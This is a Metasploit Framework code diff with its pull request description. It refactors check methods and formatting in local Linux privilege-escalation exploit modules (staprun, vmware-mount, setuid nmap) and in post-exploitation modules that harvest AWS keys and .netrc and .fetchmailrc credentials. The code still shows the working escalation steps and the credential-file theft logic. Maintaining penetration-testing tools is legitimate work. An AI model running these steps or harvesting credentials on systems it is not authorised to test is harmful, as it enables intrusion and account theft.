+        'Platform' => ['linux'],
+        'Arch' => [
           ARCH_X86,
           ARCH_X64,
           ARCH_ARMLE,
@@ -61,14 +60,16 @@ class MetasploitModule < Msf::Exploit::Local
           ARCH_MIPSLE,
           ARCH_MIPSBE
         ],
-      'SessionTypes'   => ['shell', 'meterpreter'],
-      'Targets'        => [['Auto', {}]],
-      'Notes'          =>
-        {
+        'SessionTypes' => ['shell', 'meterpreter'],
+        'Targets' => [['Auto', {}]],
+        'Notes' => {
           'Reliability' => [ REPEATABLE_SESSION ],
-          'Stability'   => [ CRASH_SAFE ]
+          'Stability' => [ CRASH_SAFE ],
+          'SideEffects' => [ARTIFACTS_ON_DISK]
         },
-      'DefaultTarget'  => 0))
+        'DefaultTarget' => 0
+      )
+    )
     register_options [
       OptString.new('STAPRUN_PATH', [true, 'Path to staprun executable', '/usr/bin/staprun'])
     ]
@@ -98,28 +99,24 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def check
+    return CheckCode::Safe("#{staprun_path} file not found") unless file? staprun_path
+
     # On some systems, staprun execution is restricted to stapusr group:
     # ---s--x---. 1 root stapusr 178488 Mar 28  2014 /usr/bin/staprun
-    unless cmd_exec("test -x '#{staprun_path}' && echo true").include? 'true'
-      vprint_error "#{staprun_path} is not executable"
-      return CheckCode::Safe
-    end
+    return CheckCode::Safe("#{staprun_path} is not executable") unless cmd_exec("test -x '#{staprun_path}' && echo true").include?('true')
+
     vprint_good "#{staprun_path} is executable"
 
-    unless setuid? staprun_path
-      vprint_error "#{staprun_path} is not setuid"
-      return CheckCode::Safe
-    end
+    return CheckCode::Safe("#{staprun_path} is not setuid") unless setuid? staprun_path
+
     vprint_good "#{staprun_path} is setuid"
 
     CheckCode::Detected
   end
 
   def exploit
-    if is_root?
-      unless datastore['ForceExploit']
-        fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'
-      end
+    if is_root? && !datastore['ForceExploit']
+      fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'
     end
 
     unless writable? base_dir
@@ -131,7 +128,7 @@ class MetasploitModule < Msf::Exploit::Local
     upload_and_chmodx payload_path, generate_payload_exe
 
     config_path = "#{base_dir}/#{payload_name}.conf"
-    upload config_path, "install uprobes /bin/sh"
+    upload config_path, 'install uprobes /bin/sh'
 
     print_status 'Executing payload...'
     res = cmd_exec "echo '#{payload_path}&' | MODPROBE_OPTIONS='-C #{config_path}' #{staprun_path} -u #{rand_text_alphanumeric 10..15}"

--- a/modules/exploits/linux/local/systemtap_modprobe_options_priv_esc.rb
+++ b/modules/exploits/linux/local/systemtap_modprobe_options_priv_esc.rb
@@ -103,7 +103,7 @@ class MetasploitModule < Msf::Exploit::Local
 
     # On some systems, staprun execution is restricted to stapusr group:
     # ---s--x---. 1 root stapusr 178488 Mar 28  2014 /usr/bin/staprun
-    return CheckCode::Safe("#{staprun_path} is not executable") unless cmd_exec("test -x '#{staprun_path}' && echo true").include?('true')
+    return CheckCode::Safe("#{staprun_path} is not executable") unless executable?(staprun_path)
 
     vprint_good "#{staprun_path} is executable"
 

--- a/modules/exploits/linux/local/vmware_mount.rb
+++ b/modules/exploits/linux/local/vmware_mount.rb
@@ -63,8 +63,11 @@ class MetasploitModule < Msf::Exploit::Local
     ]
   end
 
+  def vmware_mount
+    '/usr/bin/vmware-mount'
+  end
+
   def check
-    vmware_mount = '/usr/bin/vmware-mount'
     return CheckCode::Safe("#{vmware_mount} file not found") unless file? vmware_mount
     return CheckCode::Safe("#{vmware_mount} is not setuid") unless setuid? vmware_mount
 
@@ -79,13 +82,9 @@ class MetasploitModule < Msf::Exploit::Local
     lsb_path = File.join(datastore['WritableDir'], 'lsb_release')
     write_file(lsb_path, generate_payload_exe)
     cmd_exec("chmod +x #{lsb_path}")
-    cmd_exec("PATH=#{datastore['WritableDir']}:$PATH /usr/bin/vmware-mount")
+    cmd_exec("PATH=#{datastore['WritableDir']}:$PATH #{vmware_mount}")
     # Delete it here instead of using FileDropper because the original
     # session can clean it up
     cmd_exec("rm -f #{lsb_path}")
-  end
-
-  def setuid?(remote_file)
-    !!(cmd_exec("test -u #{remote_file.strip} && echo true").index 'true')
   end
 end

--- a/modules/exploits/linux/local/vmware_mount.rb
+++ b/modules/exploits/linux/local/vmware_mount.rb
@@ -9,59 +9,66 @@ class MetasploitModule < Msf::Exploit::Local
   include Msf::Exploit::EXE
   include Msf::Post::File
 
-  def initialize(info={})
-    super( update_info( info, {
-        'Name'          => 'VMWare Setuid vmware-mount Unsafe popen(3)',
-        'Description'   => %q{
-          VMWare Workstation (up to and including 9.0.2 build-1031769)
-          and Player have a setuid executable called vmware-mount that
-          invokes lsb_release in the PATH with popen(3). Since PATH is
-          user-controlled, and the default system shell on
-          Debian-derived distributions does not drop privs, we can put
-          an arbitrary payload in an executable called lsb_release and
-          have vmware-mount happily execute it as root for us.
-        },
-        'License'       => MSF_LICENSE,
-        'Author'        =>
-          [
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        {
+          'Name' => 'VMWare Setuid vmware-mount Unsafe popen(3)',
+          'Description' => %q{
+            VMWare Workstation (up to and including 9.0.2 build-1031769)
+            and Player have a setuid executable called vmware-mount that
+            invokes lsb_release in the PATH with popen(3). Since PATH is
+            user-controlled, and the default system shell on
+            Debian-derived distributions does not drop privs, we can put
+            an arbitrary payload in an executable called lsb_release and
+            have vmware-mount happily execute it as root for us.
+          },
+          'License' => MSF_LICENSE,
+          'Author' => [
             'Tavis Ormandy', # Vulnerability discovery and PoC
             'egypt' # Metasploit module
           ],
-        'Platform'      => [ 'linux' ],
-        'Arch'          => ARCH_X86,
-        'Targets'       =>
-          [
-            [ 'Automatic', { } ],
+          'Platform' => [ 'linux' ],
+          'Arch' => ARCH_X86,
+          'Targets' => [
+            [ 'Automatic', {} ],
           ],
-        'DefaultOptions' => {
-          "PrependSetresuid" => true,
-          "PrependSetresgid" => true,
-          "PrependFork" => true,
-        },
-        'Privileged'     => true,
-        'DefaultTarget' => 0,
-        'References' => [
-          [ 'CVE', '2013-1662' ],
-          [ 'OSVDB', '96588' ],
-          [ 'BID', '61966'],
-          [ 'URL', 'http://blog.cmpxchg8b.com/2013/08/security-debianisms.html' ],
-          [ 'URL', 'https://www.vmware.com/support/support-resources/advisories/VMSA-2013-0010.html' ],
-          [ 'URL', 'https://www.rapid7.com/blog/post/2013/09/05/cve-2013-1662-vmware-mount-exploit' ]
-        ],
-        'DisclosureDate' => '2013-08-22'
-      }
-      ))
+          'DefaultOptions' => {
+            'PrependSetresuid' => true,
+            'PrependSetresgid' => true,
+            'PrependFork' => true
+          },
+          'Privileged' => true,
+          'DefaultTarget' => 0,
+          'References' => [
+            [ 'CVE', '2013-1662' ],
+            [ 'OSVDB', '96588' ],
+            [ 'BID', '61966'],
+            [ 'URL', 'http://blog.cmpxchg8b.com/2013/08/security-debianisms.html' ],
+            [ 'URL', 'https://www.vmware.com/support/support-resources/advisories/VMSA-2013-0010.html' ],
+            [ 'URL', 'https://www.rapid7.com/blog/post/2013/09/05/cve-2013-1662-vmware-mount-exploit' ]
+          ],
+          'DisclosureDate' => '2013-08-22',
+          'Notes' => {
+            'Stability' => [CRASH_SAFE],
+            'Reliability' => [REPEATABLE_SESSION],
+            'SideEffects' => [ARTIFACTS_ON_DISK]
+          }
+        }
+      )
+    )
     register_advanced_options [
-      OptString.new("WritableDir", [ true, "A directory where you can write files.", "/tmp" ])
+      OptString.new('WritableDir', [ true, 'A directory where you can write files.', '/tmp' ])
     ]
   end
 
   def check
-    if setuid?("/usr/bin/vmware-mount")
-      CheckCode::Appears
-    else
-      CheckCode::Safe
-    end
+    vmware_mount = '/usr/bin/vmware-mount'
+    return CheckCode::Safe("#{vmware_mount} file not found") unless file? vmware_mount
+    return CheckCode::Safe("#{vmware_mount} is not setuid") unless setuid? vmware_mount
+
+    CheckCode::Appears
   end
 
   def exploit
@@ -76,11 +83,9 @@ class MetasploitModule < Msf::Exploit::Local
     # Delete it here instead of using FileDropper because the original
     # session can clean it up
     cmd_exec("rm -f #{lsb_path}")
-
   end
 
   def setuid?(remote_file)
-    !!(cmd_exec("test -u #{remote_file.strip} && echo true").index "true")
+    !!(cmd_exec("test -u #{remote_file.strip} && echo true").index 'true')
   end
 end
-

--- a/modules/exploits/unix/local/setuid_nmap.rb
+++ b/modules/exploits/unix/local/setuid_nmap.rb
@@ -32,19 +32,17 @@ class MetasploitModule < Msf::Exploit::Local
         'Platform' => %w[bsd linux unix],
         'Arch' => [ ARCH_CMD, ARCH_X86 ],
         'SessionTypes' => [ 'shell', 'meterpreter' ],
-        'Targets' =>
-          [
-            [ 'Command payload', { 'Arch' => ARCH_CMD } ],
-            [ 'Linux x86', { 'Arch' => ARCH_X86 } ],
-            [ 'BSD x86', { 'Arch' => ARCH_X86 } ],
-          ],
+        'Targets' => [
+          [ 'Command payload', { 'Arch' => ARCH_CMD } ],
+          [ 'Linux x86', { 'Arch' => ARCH_X86 } ],
+          [ 'BSD x86', { 'Arch' => ARCH_X86 } ],
+        ],
         'DefaultOptions' => { 'PrependSetresuid' => true, 'WfsDelay' => 2 },
-        'Notes' =>
-          {
-            'Reliability' => [ REPEATABLE_SESSION ],
-            'Stability' => [ CRASH_SAFE ],
-            'SideEffects' => [ ARTIFACTS_ON_DISK ]
-          },
+        'Notes' => {
+          'Reliability' => [ REPEATABLE_SESSION ],
+          'Stability' => [ CRASH_SAFE ],
+          'SideEffects' => [ ARTIFACTS_ON_DISK ]
+        },
         'DefaultTarget' => 0
       )
     )
@@ -58,12 +56,15 @@ class MetasploitModule < Msf::Exploit::Local
     ]
   end
 
+  def nmap
+    datastore['Nmap']
+  end
+
   def check
-    if setuid?(datastore['Nmap'])
-      vprint_good("#{datastore['Nmap']} is setuid")
-      return CheckCode::Vulnerable
-    end
-    CheckCode::Safe
+    return CheckCode::Safe("#{nmap} file not found") unless file? nmap
+    return CheckCode::Safe("#{nmap} is not setuid") unless setuid? nmap
+
+    CheckCode::Vulnerable("#{nmap} is setuid")
   end
 
   def exploit
@@ -96,11 +97,10 @@ class MetasploitModule < Msf::Exploit::Local
 
     begin
       # Versions before 4.75 (August 2008) will not run scripts without a port scan
-      result = cmd_exec "#{datastore['Nmap']} --script #{scriptname} -p80 localhost #{datastore['ExtraArgs']}"
+      result = cmd_exec "#{nmap} --script #{scriptname} -p80 localhost #{datastore['ExtraArgs']}"
       vprint_status(result)
     ensure
       rm_f(lua_file, exe_file)
     end
-
   end
 end

--- a/modules/post/multi/gather/aws_keys.rb
+++ b/modules/post/multi/gather/aws_keys.rb
@@ -16,16 +16,16 @@ class MetasploitModule < Msf::Post
     super(
       update_info(
         info,
-        'Name'          => 'UNIX Gather AWS Keys',
-        'Description'   => %q(
+        'Name' => 'UNIX Gather AWS Keys',
+        'Description' => %q{
           This module will attempt to read AWS configuration files
           (.aws/config, .aws//credentials and .s3cfg) for users discovered
           on the session'd system and extract AWS keys from within.
-        ),
-        'License'       => MSF_LICENSE,
-        'Author'        => [ 'Jon Hart <jon_hart[at]rapid7.com>' ],
-        'SessionTypes'  => %w(shell meterpreter),
-        'References'    => [
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [ 'Jon Hart <jon_hart[at]rapid7.com>' ],
+        'SessionTypes' => %w[shell meterpreter],
+        'References' => [
           [ 'URL', 'http://s3tools.org/kb/item14.htm' ],
           [ 'URL', 'http://docs.aws.amazon.com/cli/latest/userguide/cli-chap-getting-started.html#cli-config-files' ]
         ]
@@ -35,8 +35,13 @@ class MetasploitModule < Msf::Post
 
   def get_aws_keys(config_file)
     keys_data = []
-    config_s = cmd_exec("test -r #{config_file} && cat #{config_file}")
+    unless readable? config_file
+      vprint_error("Couldn't read #{config_file}")
+      return []
+    end
+    config_s = read_file(config_file)
     return keys_data if config_s.empty?
+
     aws_config = Rex::Parser::Ini.from_s(config_s)
     aws_config.each_key do |profile|
       # XXX: Ini assumes anything on either side of the = is the key and value
@@ -54,6 +59,7 @@ class MetasploitModule < Msf::Post
         end
       end
       next unless aws_access_key_id || aws_secret_access_key
+
       keys_data << [ config_file, aws_access_key_id, aws_secret_access_key, profile ]
     end
 
@@ -62,14 +68,15 @@ class MetasploitModule < Msf::Post
 
   def get_keys_from_files
     keys_data = []
-    vprint_status("Enumerating possible user AWS config files")
+    vprint_status('Enumerating possible user AWS config files')
     # build up a list of aws configuration files to read, including the
     # configuration files that may exist (rare)
     enum_user_directories.map do |user_dir|
       vprint_status("Looking for AWS config/credentials files in #{user_dir}")
-      %w(.aws/config .aws/credentials .s3cfg).each do |possible_key_file|
+      %w[.aws/config .aws/credentials .s3cfg].each do |possible_key_file|
         this_key_data = get_aws_keys(::File.join(user_dir, possible_key_file))
         next if this_key_data.empty?
+
         keys_data <<= this_key_data.flatten
       end
     end
@@ -81,7 +88,7 @@ class MetasploitModule < Msf::Post
     return if keys_data.empty?
 
     keys_table = Rex::Text::Table.new(
-      'Header' => "AWS Key Data",
+      'Header' => 'AWS Key Data',
       'Columns' => [ 'Source', AWS_KEY, AWS_SECRET, 'Profile' ]
     )
 

--- a/modules/post/multi/gather/fetchmailrc_creds.rb
+++ b/modules/post/multi/gather/fetchmailrc_creds.rb
@@ -7,108 +7,114 @@ class MetasploitModule < Msf::Post
   include Msf::Post::File
   include Msf::Post::Unix
 
-  def initialize(info={})
-    super( update_info( info,
-      'Name'          => 'UNIX Gather .fetchmailrc Credentials',
-      'Description'   => %q{
-        Post Module to obtain credentials saved for IMAP, POP and other mail
-        retrieval protocols in fetchmail's .fetchmailrc
-      },
-      'License'       => MSF_LICENSE,
-      'Author'        => [ 'Jon Hart <jhart[at]spoofed.org>' ],
-      'Platform'      => %w{ bsd linux osx unix },
-      'SessionTypes'  => [ 'shell' ]
-    ))
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'UNIX Gather .fetchmailrc Credentials',
+        'Description' => %q{
+          Post Module to obtain credentials saved for IMAP, POP and other mail
+          retrieval protocols in fetchmail's .fetchmailrc
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [ 'Jon Hart <jhart[at]spoofed.org>' ],
+        'Platform' => %w[bsd linux osx unix],
+        'SessionTypes' => [ 'shell' ]
+      )
+    )
   end
 
   def run
     # A table to store the found credentials.
     cred_table = Rex::Text::Table.new(
-    'Header'    => ".fetchmailrc credentials",
-    'Indent'    => 1,
-    'Columns'   =>
-    [
-      "Username",
-      "Password",
-      "Server",
-      "Protocol",
-      "Port"
-    ])
+      'Header' => '.fetchmailrc credentials',
+      'Indent' => 1,
+      'Columns' =>
+      [
+        'Username',
+        'Password',
+        'Server',
+        'Protocol',
+        'Port'
+      ]
+    )
 
     # walk through each user directory
     enum_user_directories.each do |user_dir|
-      fetchmailrc_file = ::File.join(user_dir, ".fetchmailrc")
-      begin
-        # read their .fetchmailrc if it exists
-        lines = cmd_exec("test -r #{fetchmailrc_file} && cat #{fetchmailrc_file}").lines.to_a
-        next if (lines.size <= 0)
-        print_status("Parsing #{fetchmailrc_file}")
+      fetchmailrc_file = ::File.join(user_dir, '.fetchmailrc')
+      unless readable? fetchmailrc_file
+        vprint_error("Couldn't read #{fetchmailrc_file}")
+        next
+      end
+      print_status("Reading: #{fetchmailrc_file}")
+      # read their .fetchmailrc if it exists
+      lines = read_file(fetchmailrc_file).each_line.to_a
+      next if (lines.size <= 0)
 
-        # delete any comments
-        lines.delete_if { |l| l =~ /^#/ }
-        # trim any leading/trailing whitespace
-        lines.map { |l| l.strip! }
-        # turn any multi-line config options into a single line to ease parsing
-        (lines.size - 1).downto(0) do |i|
-          # if the line we are reading doesn't signify a new configuration section...
-          if ((not lines[i] =~ /^(?:defaults|poll|skip)\s+/))
-            # append the current line to the previous
-            lines[i-1] << " "
-            lines[i-1] << lines[i]
-            # and axe the current line
-            lines.delete_at(i)
-          end
+      print_status("Parsing #{fetchmailrc_file}")
+
+      # delete any comments
+      lines.delete_if { |l| l =~ /^#/ }
+      # trim any leading/trailing whitespace
+      lines.map { |l| l.strip! }
+      # turn any multi-line config options into a single line to ease parsing
+      (lines.size - 1).downto(0) do |i|
+        # if the line we are reading doesn't signify a new configuration section...
+        next if ((lines[i] =~ /^(?:defaults|poll|skip)\s+/))
+
+        # append the current line to the previous
+        lines[i - 1] << ' '
+        lines[i - 1] << lines[i]
+        # and axe the current line
+        lines.delete_at(i)
+      end
+
+      # any default options found, used as defaults for poll or skip lines
+      # that are missing options and want to use defaults
+      defaults = {}
+
+      # now parse each line found
+      lines.each do |line|
+        # if there is a 'default' line, save any of these options as
+        # they should be used when subsequent poll/skip lines are missing them.
+        if (line =~ /^defaults/)
+          defaults = parse_fetchmailrc_line(line).first
+          next
         end
 
-        # any default options found, used as defaults for poll or skip lines
-        # that are missing options and want to use defaults
-        defaults = {}
-
-        # now parse each line found
-        lines.each do |line|
-          # if there is a 'default' line, save any of these options as
-          # they should be used when subsequent poll/skip lines are missing them.
-          if (line =~ /^defaults/)
-            defaults = parse_fetchmailrc_line(line).first
-            next
-          end
-
-          # now merge the currently parsed line with whatever defaults may have
-          # been found, then save if there is enough to save
-          parse_fetchmailrc_line(line).each do |cred|
-            cred = defaults.merge(cred)
-            if (cred[:host] and cred[:protocol])
-              if (cred[:users].size == cred[:passwords].size)
-                cred[:users].each_index do |i|
-                  cred_table << [ cred[:users][i], cred[:passwords][i], cred[:host], cred[:protocol], cred[:port] ]
-                end
-              else
-                print_error("Skipping '#{line}' -- number of users and passwords not equal")
+        # now merge the currently parsed line with whatever defaults may have
+        # been found, then save if there is enough to save
+        parse_fetchmailrc_line(line).each do |cred|
+          cred = defaults.merge(cred)
+          if (cred[:host] and cred[:protocol])
+            if (cred[:users].size == cred[:passwords].size)
+              cred[:users].each_index do |i|
+                cred_table << [ cred[:users][i], cred[:passwords][i], cred[:host], cred[:protocol], cred[:port] ]
               end
+            else
+              print_error("Skipping '#{line}' -- number of users and passwords not equal")
             end
           end
         end
-      rescue ::Exception => e
-        print_error("Couldn't read #{fetchmailrc_file}: #{e.to_s}")
       end
     end
 
-
     if cred_table.rows.empty?
-      print_status("No creds collected")
+      print_status('No creds collected')
     else
       print_line("\n" + cred_table.to_s)
 
       # store all found credentials
       p = store_loot(
-        "fetchmailrc.creds",
-        "text/csv",
+        'fetchmailrc.creds',
+        'text/csv',
         session,
         cred_table.to_csv,
-        "fetchmailrc_credentials.txt",
-        ".fetchmailrc credentials")
+        'fetchmailrc_credentials.txt',
+        '.fetchmailrc credentials'
+      )
 
-      print_status("Credentials stored in: #{p.to_s}")
+      print_status("Credentials stored in: #{p}")
     end
   end
 
@@ -119,7 +125,7 @@ class MetasploitModule < Msf::Post
     cred = {}
     # parse and clean any users
     users = line.scan(/\s+user(?:name)?\s+(\S+)/).flatten
-    unless (users.empty?)
+    unless users.empty?
       cred[:users] = []
       users.each do |user|
         cred[:users] << user.gsub(/^"/, '').gsub(/"$/, '')
@@ -127,28 +133,28 @@ class MetasploitModule < Msf::Post
     end
     # parse and clean any passwords
     passwords = line.scan(/\s+pass(?:word)?\s+(\S+)/).flatten
-    unless (passwords.empty?)
+    unless passwords.empty?
       cred[:passwords] = []
       passwords.each do |password|
         cred[:passwords] << password.gsub(/^"/, '').gsub(/"$/, '')
       end
     end
     # parse any hosts, ports and protocols
-    cred[:protocol] = $1 if (line =~ /\s+proto(?:col)?\s+(\S+)/)
-    cred[:port] = $1 if (line =~ /\s+(?:port|service)\s+(\S+)/)
-    cred[:host] = $1 if (line =~ /^(?:poll|skip)\s+(\S+)/)
+    cred[:protocol] = ::Regexp.last_match(1) if (line =~ /\s+proto(?:col)?\s+(\S+)/)
+    cred[:port] = ::Regexp.last_match(1) if (line =~ /\s+(?:port|service)\s+(\S+)/)
+    cred[:host] = ::Regexp.last_match(1) if (line =~ /^(?:poll|skip)\s+(\S+)/)
     # a 'via' option overrides poll/skip
-    cred[:host] = $1 if (line =~ /\s+via\s+(\S+)/)
+    cred[:host] = ::Regexp.last_match(1) if (line =~ /\s+via\s+(\S+)/)
     # save this credential
     creds << cred
     # fetchmail can also "forward" mail by pulling it down with POP/IMAP and then
     # connecting to some SMTP server and sending it.  If ESMTP AUTH (RFC 2554) credentials
     # are specified, steal those too.
     cred = {}
-    cred[:users] = [ $1 ] if (line =~ /\s+esmtpname\s+(\S+)/)
-    cred[:passwords] = [ $1 ] if (line =~ /\s+esmtppassword\s+(\S+)/)
+    cred[:users] = [ ::Regexp.last_match(1) ] if (line =~ /\s+esmtpname\s+(\S+)/)
+    cred[:passwords] = [ ::Regexp.last_match(1) ] if (line =~ /\s+esmtppassword\s+(\S+)/)
     # XXX: what is the best way to get the host we are currently looting?  localhost is lame.
-    cred[:host] = (line =~ /\s+smtphost\s+(\S+)/ ? $1 : 'localhost')
+    cred[:host] = (line =~ /\s+smtphost\s+(\S+)/ ? ::Regexp.last_match(1) : 'localhost')
     cred[:protocol] = 'esmtp'
     # save the ESMTP credentials if we've found enough
     creds << cred if (cred[:users] and cred[:passwords] and cred[:host])

--- a/modules/post/multi/gather/netrc_creds.rb
+++ b/modules/post/multi/gather/netrc_creds.rb
@@ -7,70 +7,75 @@ class MetasploitModule < Msf::Post
   include Msf::Post::File
   include Msf::Post::Unix
 
-  def initialize(info={})
-    super( update_info( info,
-        'Name'          => 'UNIX Gather .netrc Credentials',
-        'Description'   => %q{
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'UNIX Gather .netrc Credentials',
+        'Description' => %q{
           Post Module to obtain credentials saved for FTP and other services in .netrc
         },
-        'License'       => MSF_LICENSE,
-        'Author'        => [ 'Jon Hart <jhart[at]spoofed.org>' ],
-        'Platform'      => %w{ bsd linux osx unix },
-        'SessionTypes'  => [ 'shell' ]
-      ))
+        'License' => MSF_LICENSE,
+        'Author' => [ 'Jon Hart <jhart[at]spoofed.org>' ],
+        'Platform' => %w[bsd linux osx unix],
+        'SessionTypes' => [ 'shell' ]
+      )
+    )
   end
 
   def run
     # A table to store the found credentials.
     cred_table = Rex::Text::Table.new(
-    'Header'    => ".netrc credentials",
-    'Indent'    => 1,
-    'Columns'   =>
-    [
-      "Username",
-      "Password",
-      "Server",
-    ])
+      'Header' => '.netrc credentials',
+      'Indent' => 1,
+      'Columns' =>
+      [
+        'Username',
+        'Password',
+        'Server',
+      ]
+    )
 
     # all of the credentials we've found from .netrc
     creds = []
 
     # walk through each user directory
+    print_status('Enumerating .netrc files')
     enum_user_directories.each do |user_dir|
-      netrc_file = user_dir + "/.netrc"
+      netrc_file = user_dir + '/.netrc'
       # the current credential from .netrc we are parsing
       cred = {}
-      begin
-        print_status("Reading: #{netrc_file}")
-        # read their .netrc
-        cmd_exec("test -r #{netrc_file} && cat #{netrc_file}").each_line do |netrc_line|
-          # parse it
-          netrc_line.strip!
-          # get the machine name
-          if (netrc_line =~ /machine (\S+)/)
-            # if we've already found a machine, save this cred and start over
-            if (cred[:host])
-              creds << cred
-              cred = {}
-            end
-            cred[:host] = $1
-          end
-          # get the user name
-          if (netrc_line =~ /login (\S+)/)
-            cred[:user] = $1
-          end
-          # get the password
-          if (netrc_line =~ /password (\S+)/)
-            cred[:pass] = $1
-          end
-        end
 
-        # save whatever remains of this last cred if it is worth saving
-        creds << cred if (cred[:host] and cred[:user] and cred[:pass])
-
-      rescue ::Exception => e
-        print_error("Couldn't read #{netrc_file}: #{e.to_s}")
+      # read their .netrc
+      unless readable? netrc_file
+        vprint_error("Couldn't read #{netrc_file}")
+        next
       end
+      print_status("Reading: #{netrc_file}")
+      read_file(netrc_file).each_line do |netrc_line|
+        # parse it
+        netrc_line.strip!
+        # get the machine name
+        if (netrc_line =~ /machine (\S+)/)
+          # if we've already found a machine, save this cred and start over
+          if (cred[:host])
+            creds << cred
+            cred = {}
+          end
+          cred[:host] = ::Regexp.last_match(1)
+        end
+        # get the user name
+        if (netrc_line =~ /login (\S+)/)
+          cred[:user] = ::Regexp.last_match(1)
+        end
+        # get the password
+        if (netrc_line =~ /password (\S+)/)
+          cred[:pass] = ::Regexp.last_match(1)
+        end
+      end
+
+      # save whatever remains of this last cred if it is worth saving
+      creds << cred if (cred[:host] and cred[:user] and cred[:pass])
     end
 
     # print out everything we've found
@@ -79,20 +84,21 @@ class MetasploitModule < Msf::Post
     end
 
     if cred_table.rows.empty?
-      print_status("No creds collected")
+      print_status('No creds collected')
     else
       print_line("\n" + cred_table.to_s)
 
       # store all found credentials
       p = store_loot(
-        "netrc.creds",
-        "text/csv",
+        'netrc.creds',
+        'text/csv',
         session,
         cred_table.to_csv,
-        "netrc_credentials.txt",
-        ".netrc credentials")
+        'netrc_credentials.txt',
+        '.netrc credentials'
+      )
 
-      print_status("Credentials stored in: #{p.to_s}")
+      print_status("Credentials stored in: #{p}")
     end
   end
 end

--- a/modules/post/multi/recon/sudo_commands.rb
+++ b/modules/post/multi/recon/sudo_commands.rb
@@ -10,25 +10,28 @@ class MetasploitModule < Msf::Post
   include Msf::Auxiliary::Report
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'          => 'Sudo Commands',
-      'Description'   => %q{
-        This module examines the sudoers configuration for the session user
-        and lists the commands executable via sudo.
+    super(
+      update_info(
+        info,
+        'Name' => 'Sudo Commands',
+        'Description' => %q{
+          This module examines the sudoers configuration for the session user
+          and lists the commands executable via sudo.
 
-        This module also inspects each command and reports potential avenues
-        for privileged code execution due to poor file system permissions or
-        permitting execution of executables known to be useful for privesc,
-        such as utilities designed for file read/write, user modification,
-        or execution of arbitrary operating system commands.
+          This module also inspects each command and reports potential avenues
+          for privileged code execution due to poor file system permissions or
+          permitting execution of executables known to be useful for privesc,
+          such as utilities designed for file read/write, user modification,
+          or execution of arbitrary operating system commands.
 
-        Note, you may need to provide the password for the session user.
-      },
-      'License'       => MSF_LICENSE,
-      'Author'        => [ 'bcoles' ],
-      'Platform'      => [ 'bsd', 'linux', 'osx', 'solaris', 'unix' ],
-      'SessionTypes'  => [ 'meterpreter', 'shell' ]
-    ))
+          Note, you may need to provide the password for the session user.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [ 'bcoles' ],
+        'Platform' => [ 'bsd', 'linux', 'osx', 'solaris', 'unix' ],
+        'SessionTypes' => [ 'meterpreter', 'shell' ]
+      )
+    )
     register_options [
       OptString.new('SUDO_PATH', [ true, 'Path to sudo executable', '/usr/bin/sudo' ]),
       OptString.new('PASSWORD', [ false, 'Password for the current user', '' ])
@@ -41,10 +44,6 @@ class MetasploitModule < Msf::Post
 
   def password
     datastore['PASSWORD'].to_s
-  end
-
-  def is_executable?(path)
-    cmd_exec("test -x '#{path}' && echo true").include? 'true'
   end
 
   def eop_bins
@@ -76,7 +75,7 @@ class MetasploitModule < Msf::Post
       return true
     end
 
-    base_dir  = File.dirname cmd
+    base_dir = File.dirname cmd
     base_name = File.basename cmd
 
     if file_exist? cmd
@@ -184,7 +183,7 @@ class MetasploitModule < Msf::Post
         @results << [cmd, user, group, no_passwd ? '' : 'True', eop ? 'True' : '']
       end
     end
-  rescue => e
+  rescue StandardError => e
     print_error "Could not parse sudo output: #{e.message}"
   end
 
@@ -193,7 +192,7 @@ class MetasploitModule < Msf::Post
       fail_with Failure::BadConfig, 'Session already has root privileges'
     end
 
-    unless is_executable? sudo_path
+    unless executable? sudo_path
       print_error 'Could not find sudo executable'
       return
     end
@@ -215,8 +214,8 @@ class MetasploitModule < Msf::Post
     end
 
     @results = Rex::Text::Table.new(
-      'Header'  => 'Sudo Commands',
-      'Indent'  => 2,
+      'Header' => 'Sudo Commands',
+      'Indent' => 2,
       'Columns' =>
         [
           'Command',


### PR DESCRIPTION
I ran `local_exploit_suggester` on a linux box, and to my surprise many modules throw exceptions.  Looks like the main reason was a `suid?` or `stat` call on a file before confirming it existed, thus throwing an exception. 

This PR cleans up the check methods to ensure the file is there before doing things with it. It simplifies the calls to CheckCodes to incorporate the reason, and adds a few notes sections that msftidy insisted I add.

All other changes are rubocop and autoformatting.

## Before

```
msf6 post(multi/recon/local_exploit_suggester) > run

[*] 2.2.2.2 - Collecting local exploits for x86/linux...
[*] 2.2.2.2 - 173 exploit checks are being tried...
[+] 2.2.2.2 - exploit/linux/local/cve_2022_0847_dirtypipe: The target appears to be vulnerable. Linux kernel version found: 5.15.0
[+] 2.2.2.2 - exploit/linux/local/pkexec: The service is running, but could not be validated.
[+] 2.2.2.2 - exploit/linux/local/su_login: The target appears to be vulnerable.
[+] 2.2.2.2 - exploit/linux/local/ubuntu_enlightenment_mount_priv_esc: The target appears to be vulnerable.
[*] Running check method for exploit 51 / 51
[*] 2.2.2.2 - Valid modules for session 2:
============================

 #   Name                                                               Potentially Vulnerable?  Check Result
 -   ----                                                               -----------------------  ------------
 1   exploit/linux/local/cve_2022_0847_dirtypipe                        Yes                      The target appears to be vulnerable. Linux kernel version found: 5.15.0
 2   exploit/linux/local/pkexec                                         Yes                      The service is running, but could not be validated.
 3   exploit/linux/local/su_login                                       Yes                      The target appears to be vulnerable.
 4   exploit/linux/local/ubuntu_enlightenment_mount_priv_esc            Yes                      The target appears to be vulnerable.
 5   exploit/linux/local/abrt_raceabrt_priv_esc                         No                       The target is not exploitable.
 6   exploit/linux/local/abrt_sosreport_priv_esc                        No                       The target is not exploitable.
 7   exploit/linux/local/af_packet_chocobo_root_priv_esc                No                       The target is not exploitable. Linux kernel 5.15.0-48-generic #54-Ubuntu is not vulnerable
 8   exploit/linux/local/af_packet_packet_set_ring_priv_esc             No                       The target is not exploitable.
 9   exploit/linux/local/apport_abrt_chroot_priv_esc                    No                       The target is not exploitable.
 10  exploit/linux/local/asan_suid_executable_priv_esc                  No                       The check raised an exception.
 11  exploit/linux/local/blueman_set_dhcp_handler_dbus_priv_esc         No                       The target is not exploitable.
